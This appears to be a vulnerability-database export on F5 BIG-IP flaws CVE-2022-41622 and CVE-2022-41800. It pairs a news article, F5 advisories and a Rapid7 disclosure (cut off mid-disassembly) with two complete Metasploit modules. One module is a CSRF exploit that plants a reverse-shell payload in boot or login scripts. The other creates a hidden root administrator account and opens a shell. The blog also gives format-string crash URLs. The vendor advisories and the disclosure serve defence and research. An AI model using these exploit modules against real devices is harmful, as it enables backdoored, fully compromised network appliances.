'SideEffects' => [\n IOC_IN_LOGS,\n ARTIFACTS_ON_DISK\n ]\n }\n )\n )\n\n register_options(\n [\n OptString.new('TARGET_HOST', [true, 'The IP or domain name of the target F5 device']),\n OptString.new('TARGET_URI', [true, 'The URI of the SOAP API', '/iControl/iControlPortal.cgi']),\n OptBool.new('TARGET_SSL', [true, 'Use SSL for the upstream connection?', true]),\n OptString.new('FILENAME', [false, 'The file on the target to overwrite (for \"custom\" target) - note that SELinux prevents overwriting a great deal of useful files']),\n ]\n )\n end\n\n def on_request_uri(socket, _request)\n if datastore['TARGET'] == 0 # restart\n filename = '/shared/f5_update_action'\n file_payload = <<~EOT\n UpdateAction\n https://localhost/success`#{payload.encoded}`\n https://localhost/error\n 0\n 0\n 0\n 0\n EOT\n\n # Delete the logfile if we get a session\n register_file_for_cleanup('/var/log/f5_update_checker.out')\n\n print_status(\"Redirecting the admin to overwrite #{filename}; if successful, your session will come approximately 2 minutes after the target is rebooted\")\n elsif datastore['TARGET'] == 1 # login\n filename = '/var/run/config/timeout.sh'\n file_payload = \"#{payload.encoded} & disown;\"\n\n # Delete the backdoored file if we get a session.. this will be fixed at\n # next reboot\n register_file_for_cleanup('/var/run/config/timeout.sh')\n\n print_status(\"Redirecting the admin to overwrite #{filename}; if successful, your session will come the next time a user logs in interactively\")\n else # Custom\n\n filename = datastore['FILENAME']\n file_payload = payload.encoded\n\n print_status(\"Redirecting the admin to overwrite #{filename} with the payload\")\n end\n\n # Build the SOAP request that'll be sent to the target server\n csrf_payload = %(\n <soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:con=\"urn:iControl:System/ConfigSync\">\n <soapenv:Header/>\n <soapenv:Body>\n <con:upload_file soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <file_name xsi:type=\"xsd:string\">#{filename}</file_name>\n <file_context xsi:type=\"urn:System.ConfigSync.FileTransferContext\" xmlns:urn=\"urn:iControl\">\n <!--type: Common.OctetSequence-->\n <file_data xsi:type=\"urn:Common.OctetSequence\">#{Rex::Text.encode_base64(file_payload)}</file_data>\n <chain_type xsi:type=\"urn:Common.FileChainType\">FILE_FIRST_AND_LAST</chain_type>\n </file_context>\n </con:upload_file>\n </soapenv:Body>\n</soapenv:Envelope>\n )\n\n # Build the target URL\n target_url = \"#{datastore['TARGET_SSL'] ? 'https' : 'http'}://#{datastore['TARGET_HOST']}#{datastore['TARGET_URI']}\"\n\n # Build the HTML payload that'll send the SOAP request via the user's browser\n html_payload = %(\n<html>\n <body>\n <form action=\"#{target_url}\" method=\"POST\" enctype=\"text/plain\">\n <textarea id=\"payload\" name=\"&lt;!--\">--&gt;#{Rex::Text.html_encode(csrf_payload)}</textarea>\n </form>\n <script>\n document.forms[0].submit();\n </script>\n </body>\n</html>\n )\n\n # Send the HTML to the browser\n send_response(socket, html_payload, { 'Content-Type' => 'text/html' })\n end\n\n def exploit\n # Sanity check\n if datastore['TARGET'] == 2 && (!datastore['FILENAME'] || datastore['FILENAME'].empty?)\n fail_with(Failure::BadConfig, 'For custom targets, please provide the FILENAME')\n end\n\n print_good('Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below')\n super\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2022-11-18T06:07:33", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEirxx9Y9QPuT5YjS4qVUHPX6HrTMxaZvdzQAGYAGa4c3ZmQ0d9frPiE2XxlWHjKea_UmoQ_QM5xRb18kEv7DcTQfztfQ2ifqniNVN8lPEwA-zA3BrWjAfRP7OzkqlIWxyFYdhKsh0LPZ6poG9X8NYV7IltViMModBVtUZLm8-RS7HZm_Bi7kJ_oR86t/s728-e100/f5.jpg>)\n\nMultiple security vulnerabilities have been disclosed in F5 BIG-IP and BIG-IQ devices that, if successfully exploited, to completely compromise affected systems.\n\nCybersecurity firm Rapid7 said the [flaws](<https://support.f5.com/csp/article/K97843387>) could be abused to remote access to the devices and defeat security constraints. The issues impact BIG-IP versions 13.x, 14.x, 15.x, 16.x, and 17.x, and BIG-IQ Centralized Management versions 7.x and 8.x.\n\nThe two high-severity issues, which were reported to F5 on August 18, 2022, are as follows -\n\n * **CVE-2022-41622** (CVSS score: 8.8) - A cross-site request forgery ([CSRF](<https://owasp.org/www-community/attacks/csrf>)) vulnerability through iControl SOAP, leading to unauthenticated remote code execution.\n * **CVE-2022-41800** (CVSS score: 8.7) - An iControl REST vulnerability that could allow an authenticated user with an Administrator role to bypass [Appliance mode](<https://support.f5.com/csp/article/K12815>) restrictions.\n\n\"By successfully exploiting the worst of the vulnerabilities (CVE-2022-41622), an attacker could gain persistent root access to the device's management interface (even if the management interface is not internet-facing),\" Rapid7 researcher Ron Bowes [said](<https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/>).\n\nHowever, it's worth noting that such an exploit requires an administrator with an active session to visit a hostile website.\n\nAlso identified were [three different instances](<https://support.f5.com/csp/article/K05403841>) of security bypass, which F5 said cannot be exploited without first breaking existing security barriers through a previously undocumented mechanism.\n\nShould such a scenario arise, an adversary with Advanced Shell ([bash](<https://en.wikipedia.org/wiki/Bash_\\(Unix_shell\\)>)) access to the appliance could weaponize these weaknesses to execute arbitrary system commands, create or delete files, or disable services.\n\nWhile F5 has made no mention of any of the vulnerabilities being exploited in attacks, it's recommended that users apply the necessary \"engineering hotfix\" released by the company to mitigate potential risks.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-11-17T06:58:00", "type": "thn", "title": "High Severity Vulnerabilities Reported in F5 BIG-IP and BIG-IQ Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41622", "CVE-2022-41800"], "modified": "2022-11-18T04:16:42", "id": "THN:AE146F0CB0EBDFC82FFBD33FE82302CD", "href": "https://thehackernews.com/2022/11/high-severity-vulnerabilities-reported.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2023-02-03T18:27:17", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-02-03T00:00:00", "type": "zdt", "title": "F5 Big-IP Create Administrative User Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41622", "CVE-2022-41800"], "modified": "2023-02-03T00:00:00", "id": "1337DAY-ID-38183", "href": "https://0day.today/exploit/description/38183", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'unix_crypt'\n\nclass MetasploitModule < Msf::Exploit::Local\n include Msf::Post::Linux::F5Mcp\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'F5 Big-IP Create Admin User',\n 'Description' => %q{\n This creates a local user with a username/password and root-level\n privileges. Note that a root-level account is not required to do this,\n which makes it a privilege escalation issue.\n\n Note that this is pretty noisy, since it creates a user account and\n creates log files and such. Additionally, most (if not all)\n vulnerabilities in F5 grant root access anyways.\n\n Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['Ron Bowes'],\n 'Platform' => [ 'unix', 'linux', 'python' ],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'References' => [\n ['URL', 'https://github.com/rbowes-r7/refreshing-mcp-tool'], # Original PoC\n ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],\n ['URL', 'https://support.f5.com/csp/article/K97843387'],\n ],\n 'Privileged' => true,\n 'DisclosureDate' => '2022-11-16',\n 'Arch' => [ ARCH_CMD, ARCH_PYTHON ],\n 'Type' => :unix_cmd,\n 'Targets' => [[ 'Auto', {} ]],\n 'Notes' => {\n 'Stability' => [],\n 'Reliability' => [],\n 'SideEffects' => []\n }\n )\n )\n\n register_options([\n OptString.new('USERNAME', [true, 'Username to create (default: random)', Rex::Text.rand_text_alphanumeric(8)]),\n OptString.new('PASSWORD', [true, 'Password for the new user (default: random)', Rex::Text.rand_text_alphanumeric(12)]),\n\n OptBool.new('CREATE_SESSION', [true, 'If set, use the new account to create a root session', true]),\n ])\n end\n\n def exploit\n # Get or generate the username/password\n fail_with(Failure::BadConfig, 'USERNAME cannot be empty') if datastore['USERNAME'].empty?\n username = datastore['USERNAME']\n\n if datastore['CREATE_SESSION']\n password = Rex::Text.rand_text_alphanumeric(12)\n new_password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)\n\n print_status(\"Will attempt to create user #{username} / #{password}, then change password to #{new_password} when creating a session\")\n else\n password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)\n\n print_status(\"Will attempt to create user #{username} / #{password}\")\n end\n\n # If the password is already hashed, leave it as-is\n vprint_status('Hashing the password with SHA512')\n hashed_password = UnixCrypt::SHA512.build(password)\n\n if !hashed_password || hashed_password.empty?\n fail_with(Failure::BadConfig, 'Failed to hash the password with String.crypt')\n end\n\n # These requests have to go in a single 'session', which, to us, is\n # a single packet (since we don't have AF_UNIX sockets)\n result = mcp_send_recv([\n # Authenticate as 'admin' (this probably shouldn't work but does)\n mcp_build('user_authenticated', 'structure', [\n mcp_build('user_authenticated_name', 'string', 'admin')\n ]),\n\n # Start transaction\n mcp_build('start_transaction', 'structure', [\n mcp_build('start_transaction_load_type', 'ulong', 0)\n ]),\n\n # Create the role mapping\n mcp_build('create', 'structure', [\n mcp_build('user_role_partition', 'structure', [\n mcp_build('user_role_partition_user', 'string', username),\n mcp_build('user_role_partition_role', 'ulong', 0),\n mcp_build('user_role_partition_partition', 'string', '[All]'),\n ])\n ]),\n\n # Create the userdb entry\n mcp_build('create', 'structure', [\n mcp_build('userdb_entry', 'structure', [\n mcp_build('userdb_entry_name', 'string', username),\n mcp_build('userdb_entry_partition_id', 'string', 'Common'),\n mcp_build('userdb_entry_is_system', 'ulong', 0),\n mcp_build('userdb_entry_shell', 'string', '/bin/bash'),\n mcp_build('userdb_entry_is_crypted', 'ulong', 1),\n mcp_build('userdb_entry_passwd', 'string', hashed_password),\n ])\n ]),\n\n # Finish the transaction\n mcp_build('end_transaction', 'structure', [])\n ])\n\n # Handle errors\n if result.nil?\n fail_with(Failure::Unknown, 'Request to mcp appeared to fail')\n end\n\n # The only result we really care about is an error\n error_returned = false\n result.each do |r|\n result = mcp_get_single(r, 'result')\n result_code = mcp_get_single(result, 'result_code')\n\n # If there's no code or it's zero, just ignore it\n if result_code.nil? || result_code == 0\n next\n end\n\n # If we're here, an error was returned!\n error_returned = true\n\n # Otherwise, try and get result_message\n result_message = mcp_get_single(result, 'result_message')\n if result_message.nil?\n print_warning(\"mcp query returned a non-zero result (#{result_code}), but no error message\")\n else\n print_error(\"mcp query returned an error message: #{result_message} (code: #{result_code})\")\n end\n end\n\n # Let them know if it likely worked\n if !error_returned\n print_good(\"Service didn't return an error, so user was likely created!\")\n\n if datastore['CREATE_SESSION']\n print_status('Attempting create a root session...')\n\n out = cmd_exec(\"echo -ne \\\"#{password}\\\\n#{password}\\\\n#{new_password}\\\\n#{new_password}\\\\n#{payload.encoded}\\\\n\\\" | su #{username}\")\n\n vprint_status(\"Output from su command: #{out}\")\n end\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/38183", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-08T22:30:11", "description": "This Metasploit module exploits a cross-site request forgery (CSRF) vulnerability in F5 Big-IP's iControl interface to write an arbitrary file to the filesystem. While any file can be written to any location as root, the exploitability is limited by SELinux; the vast majority of writable locations are unavailable. By default, we write to a script that executes at reboot, which means the payload will execute the next time the server boots. An alternate target - Login - will add a backdoor that executes next time a user logs in interactively. This overwrites a file, but we restore it when we get a session Note that because this is a CSRF vulnerability, it starts a web server, but an authenticated administrator must visit the site, which redirects them to the target.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-21T00:00:00", "type": "zdt", "title": "F5 BIG-IP iControl Cross Site Request Forgery Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41622", "CVE-2022-41800"], "modified": "2022-11-21T00:00:00", "id": "1337DAY-ID-38080", "href": "https://0day.today/exploit/description/38080", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'F5 BIG-IP iControl CSRF File Write SOAP API',\n 'Description' => %q{\n This module exploits a cross-site request forgery (CSRF) vulnerability\n in F5 Big-IP's iControl interface to write an arbitrary file to the\n filesystem.\n\n While any file can be written to any location as root, the\n exploitability is limited by SELinux; the vast majority of writable\n locations are unavailable. By default, we write to a script that\n executes at reboot, which means the payload will execute the next time\n the server boots.\n\n An alternate target - Login - will add a backdoor that executes next\n time a user logs in interactively. This overwrites a file,\n but we restore it when we get a session\n\n Note that because this is a CSRF vulnerability, it starts a web\n server, but an authenticated administrator must visit the site, which\n redirects them to the target.\n },\n 'Author' => [\n 'Ron Bowes' # Discovery, PoC, and module\n ],\n 'References' => [\n ['CVE', '2022-41622'],\n ['URL', 'https://github.com/rbowes-r7/refreshing-soap-exploit'],\n ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],\n ['URL', 'https://support.f5.com/csp/article/K97843387'],\n ['URL', 'https://support.f5.com/csp/article/K94221585'],\n ['URL', 'https://support.f5.com/csp/article/K05403841'],\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2022-11-16', # Vendor advisory\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD],\n 'Type' => :unix_cmd,\n 'Privileged' => true,\n 'Targets' => [\n [ 'Restart', {}, ],\n [ 'Login', {}, ],\n [ 'Custom', {}, ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS,\n ARTIFACTS_ON_DISK\n ]\n }\n )\n )\n\n register_options(\n [\n OptString.new('TARGET_HOST', [true, 'The IP or domain name of the target F5 device']),\n OptString.new('TARGET_URI', [true, 'The URI of the SOAP API', '/iControl/iControlPortal.cgi']),\n OptBool.new('TARGET_SSL', [true, 'Use SSL for the upstream connection?', true]),\n OptString.new('FILENAME', [false, 'The file on the target to overwrite (for \"custom\" target) - note that SELinux prevents overwriting a great deal of useful files']),\n ]\n )\n end\n\n def on_request_uri(socket, _request)\n if datastore['TARGET'] == 0 # restart\n filename = '/shared/f5_update_action'\n file_payload = <<~EOT\n UpdateAction\n https://localhost/success`#{payload.encoded}`\n https://localhost/error\n 0\n 0\n 0\n 0\n EOT\n\n # Delete the logfile if we get a session\n register_file_for_cleanup('/var/log/f5_update_checker.out')\n\n print_status(\"Redirecting the admin to overwrite #{filename}; if successful, your session will come approximately 2 minutes after the target is rebooted\")\n elsif datastore['TARGET'] == 1 # login\n filename = '/var/run/config/timeout.sh'\n file_payload = \"#{payload.encoded} & disown;\"\n\n # Delete the backdoored file if we get a session.. this will be fixed at\n # next reboot\n register_file_for_cleanup('/var/run/config/timeout.sh')\n\n print_status(\"Redirecting the admin to overwrite #{filename}; if successful, your session will come the next time a user logs in interactively\")\n else # Custom\n\n filename = datastore['FILENAME']\n file_payload = payload.encoded\n\n print_status(\"Redirecting the admin to overwrite #{filename} with the payload\")\n end\n\n # Build the SOAP request that'll be sent to the target server\n csrf_payload = %(\n <soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:con=\"urn:iControl:System/ConfigSync\">\n <soapenv:Header/>\n <soapenv:Body>\n <con:upload_file soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <file_name xsi:type=\"xsd:string\">#{filename}</file_name>\n <file_context xsi:type=\"urn:System.ConfigSync.FileTransferContext\" xmlns:urn=\"urn:iControl\">\n <!--type: Common.OctetSequence-->\n <file_data xsi:type=\"urn:Common.OctetSequence\">#{Rex::Text.encode_base64(file_payload)}</file_data>\n <chain_type xsi:type=\"urn:Common.FileChainType\">FILE_FIRST_AND_LAST</chain_type>\n </file_context>\n </con:upload_file>\n </soapenv:Body>\n</soapenv:Envelope>\n )\n\n # Build the target URL\n target_url = \"#{datastore['TARGET_SSL'] ? 'https' : 'http'}://#{datastore['TARGET_HOST']}#{datastore['TARGET_URI']}\"\n\n # Build the HTML payload that'll send the SOAP request via the user's browser\n html_payload = %(\n<html>\n <body>\n <form action=\"#{target_url}\" method=\"POST\" enctype=\"text/plain\">\n <textarea id=\"payload\" name=\"<!--\">-->#{Rex::Text.html_encode(csrf_payload)}</textarea>\n </form>\n <script>\n document.forms[0].submit();\n </script>\n </body>\n</html>\n )\n\n # Send the HTML to the browser\n send_response(socket, html_payload, { 'Content-Type' => 'text/html' })\n end\n\n def exploit\n # Sanity check\n if datastore['TARGET'] == 2 && (!datastore['FILENAME'] || datastore['FILENAME'].empty?)\n fail_with(Failure::BadConfig, 'For custom targets, please provide the FILENAME')\n end\n\n print_good('Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below')\n super\n end\nend\n", "sourceHref": "https://0day.today/exploit/38080", "cvss": {"score": 0.0, "vector": "NONE"}}], "f5": [{"lastseen": "2022-12-08T22:33:57", "description": "On November 16, 2022, F5 announced the following issues. This document is intended to serve as an overview of these issues to help determine the impact to your F5 devices. You can find the details of each issue in the associated articles.\n\nDistributed Cloud and Managed Services\n\nService | Status \n---|--- \nF5 Distributed Cloud Services | Does not affect or has been resolved \nSilverline | Does not affect or has been resolved \nThreat Stack | Does not affect or has been resolved \n \n * [High CVEs](<https://support.f5.com/csp/article/K97843387#high>)\n * [Improvements](<https://support.f5.com/csp/article/K97843387#improvement>)\n\nHigh CVEs\n\nArticle (CVE) | CVSS score | Affected products | Affected versions1 | Fixes introduced in \n---|---|---|---|--- \n[K94221585: iControl SOAP vulnerability CVE-2022-41622](<https://support.f5.com/csp/article/K94221585>) | 8.8 | BIG-IP (all modules) | 17.0.0 \n16.1.0 - 16.1.3 \n15.1.0 - 15.1.8 \n14.1.0 - 14.1.5 \n13.1.0 - 13.1.5 | None \nBIG-IQ Centralized Management | 8.0.0 - 8.2.0 \n7.1.0 | None \n[K13325942: Appliance mode iControl REST vulnerability CVE-2022-41800](<https://support.f5.com/csp/article/K13325942>) | 8.7 - Appliance mode only | BIG-IP (all modules) | 17.0.0 \n16.1.0 - 16.1.3 \n15.1.0 - 15.1.8 \n14.1.0 - 14.1.5 \n13.1.0 - 13.1.5 | None \n \n1F5 evaluates only software versions that have not yet reached the End of Technical Support (EoTS) phase of their lifecycle.\n\nImprovements\n\nArticle (Improvements) | Affected products | Affected versions1 | Fixes introduced in \n---|---|---|--- \n[K05403841: BIG-IP and BIG-IQ improvements disclosed by Rapid7](<https://support.f5.com/csp/article/K05403841>) | BIG-IP (all modules) | 17.0.0 \n16.1.0 - 16.1.3 \n15.1.0 - 15.1.8 \n14.1.0 - 14.1.5 \n13.1.0 - 13.1.5 | None \nBIG-IQ Centralized Management | 8.0.0 - 8.2.0 \n7.1.0 | None \n \n1F5 evaluates only software versions that have not yet reached the End of Technical Support (EoTS) phase of their lifecycle.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-16T14:28:00", "type": "f5", "title": "Overview of F5 vulnerabilities (November 2022)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-41622", "CVE-2022-41800"], "modified": "2022-11-16T14:28:00", "id": "F5:K97843387", "href": "https://support.f5.com/csp/article/K97843387", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-08T22:31:09", "description": "BIG-IP and BIG-IQ are vulnerable to cross-site request forgery (CSRF) attacks through iControl SOAP. ([CVE-2022-41622](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41622>))\n\nImpact\n\nAn attacker may trick users who have at least resource administrator role privilege and are authenticated through basic authentication in iControl SOAP into performing critical actions. An attacker can exploit this vulnerability only through the control plane, not through the data plane. If exploited, the vulnerability can compromise the complete system.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-16T14:19:00", "type": "f5", "title": "iControl SOAP vulnerability CVE-2022-41622", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-41622"], "modified": "2022-12-03T00:05:00", "id": "F5:K94221585", "href": "https://support.f5.com/csp/article/K94221585", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-12T18:45:40", "description": "When running in Appliance mode, an authenticated user assigned the Administrator role may be able to bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. A successful exploit can allow the attacker to cross a security boundary. ([CVE-2022-41800](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41800>))\n\nImpact\n\nIn Appliance mode, an authenticated user with valid user credentials assigned the Administrator role may be able to bypass Appliance mode restrictions. This is a control plane issue; there is no data plane exposure. Appliance mode is enforced by a specific license or may be enabled or disabled for individual Virtual Clustered Multiprocessing (vCMP) guest instances.\n\nFor more information about Appliance mode, refer to [K12815: Overview of Appliance mode](<https://support.f5.com/csp/article/K12815>).\n", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 8.7, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.8}, "published": "2022-11-10T20:46:00", "type": "f5", "title": "Appliance mode iControl REST vulnerability CVE-2022-41800", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-41800"], "modified": "2022-11-22T00:07:00", "id": "F5:K13325942", "href": "https://support.f5.com/csp/article/K13325942", "cvss": {"score": 0.0, "vector": "NONE"}}], "rapid7blog": [{"lastseen": "2023-02-09T18:13:06", "description": "\n\nWhile following up our [previous work on F5's BIG-IP devices](<https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/>), Rapid7 found an additional vulnerability in the appliance-mode REST interface; the vulnerability was assigned CVE-2023-22374. We reported it to F5 on December 6, 2022, and are now disclosing it in accordance with our [vulnerability disclosure policy](<https://www.rapid7.com/disclosure/>). \nThe specific issue we discovered is an authenticated format string vulnerability ([CWE-134](<https://cwe.mitre.org/data/definitions/134.html>)) in the SOAP interface (`iControlPortal.cgi`), which runs as root and requires an administrative login to access. By inserting format string specifiers (such as `%s` or `%n`) into certain GET parameters, an attacker can cause the service to read and write memory addresses that are referenced from the stack. In addition to being an authenticated administrative endpoint, the disclosed memory is written to a log (making it a blind attack). It is difficult to influence the specific addresses read and written, which makes this vulnerability very difficult to exploit (beyond crashing the service) in practice. This has a CVSS score of 7.5 for standard mode deployments and 8.5 in appliance mode.\n\n## Products\n\nThis issue affects BIG-IP only (not BIG-IQ), and as of writing are not yet patched. The currently supported versions known to be vulnerable are:\n\n * F5 BIG-IP 17.0.0\n * F5 BIG-IP 16.1.2.2 - 16.1.3\n * F5 BIG-IP 15.1.5.1 - 15.1.8\n * F5 BIG-IP 14.1.4.6 - 14.1.5\n * F5 BIG-IP 13.1.5\n\n## Discoverer\n\nThis issue was discovered by [Ron Bowes](<https://infosec.exchange/@iagox86>) of Rapid7. It is being disclosed in accordance with Rapid7\u2019s [vulnerability disclosure policy](<https://www.rapid7.com/disclosure/#zeroday>).\n\n## Exploitation\n\nThe issue we are disclosing is a blind [format string vulnerability](<https://owasp.org/www-community/attacks/Format_string_attack>), where an authenticated attacker can insert arbitrary format string characters (such as `%d`, `%x`, `%s`, and `%n`) into a query parameter, which are passed into the function `syslog()`, which processes format-string specifiers. This does not require the attacker to actually read the syslog entries\u2014it's the act of parsing the format string that is problematic. That also means that the attacker can't _read_ the memory, unless they have an additional way to read the syslog. By using the `%s` specifier, the service can be trivially crashed with a segmentation fault (because it tries to dereference pointers on the stack as strings). Using `%n`, arbitrary data can be written to any pointer found on the stack\u2014depending on what's present on the stack, this may be exploitable for remote code execution.\n\nThe issue occurs in `WSDL=` parameter in the following authenticated administrative URL:\n\n * <https://bigip.example.com/iControl/iControlPortal.cgi?WSDL=ASM.LoggingProfile>\n\nThe value of the `WSDL=` parameter is written to the syslog:\n \n \n Nov 29 08:32:25 bigip.example.org soap[4335]: query: WSDL=ASM.LoggingProfile\n \n\nIf an attacker adds format-string characters to that argument, they will be processed and values from the stack can be written to the syslog (an attacker wouldn't be able to see this, so it's actually a blind format-string vulnerability). For example, this URL:\n\n * `https://bigip.example.com/iControl/iControlPortal.cgi?WSDL=ASM.LoggingProfile:%08x:%08x:%08x:%08x:%08x:%08x:%08x:%08x`\n\nMight write the following, after expanding the `%08x` format specifiers to values from the stack (the colons are just for readability):\n \n \n Nov 29 08:41:47 bigip.example.org soap[4335]: query: WSDL=ASM.LoggingProfile:0000004c:0000004c:08cb31bc:08cba210:08cc4954:01000000:ffeaa378:f5aa8000\n \n\nOnce again, we should note that an attacker cannot see this log, and therefore cannot use this to disclose memory. We can, however, use a `%s` format specifier to tell the service to try and render a string from the stack. If the value on the stack is not a valid memory address (such as the first value, which is `0x0000004c`), the process will crash with a segmentation fault. We can also use the `%n` format specifier to write a (mostly) arbitrary value to a memory address found on the stack.\n\nHere is an example of using the `%s` specifier in a request:\n\n * `https://bigip.example.com/iControl/iControlPortal.cgi?WSDL=ASM.LoggingProfile:%s`\n\nIf we send that to the server (as an authenticated request), the service will crash. We can attach a debugger to the server process to validate:\n \n \n [root@bigip:Active:Standalone] config # /tmp/gdb-7.10.1-x64 -q --pid=4335[...](gdb) contContinuing.\n Program received signal SIGSEGV, Segmentation fault.0xf55e3085 in vfprintf () from /lib/libc.so.6(gdb) bt#0 0xf55e3085 in vfprintf () from /lib/libc.so.6#1 0xf568f21f in __vsyslog_chk () from /lib/libc.so.6#2 0xf568f317 in syslog () from /lib/libc.so.6#3 0x0810cc1f in PortalDispatch::HandleWSDLRequest(char*) ()#4 0x08109f08 in iControlPortal::run(int) ()#5 0x0810947f in main ()\n \n\nThe actual vulnerable code in `PortalDispatch::HandleWSDLRequest` in `iControlPortal.cgi` is (in a disassembler):\n \n \n .text:0810CBF2 loc_810CBF2: ; CODE XREF: PortalDispatch::HandleWSDLRequest(char *)+DD\u2191j.text:0810CBF2 pop ecx.text:0810CBF3 pop edi.text:0810CBF4 push esi ; Query string.text:0810CBF5 push eax.text:0810CBF6 call 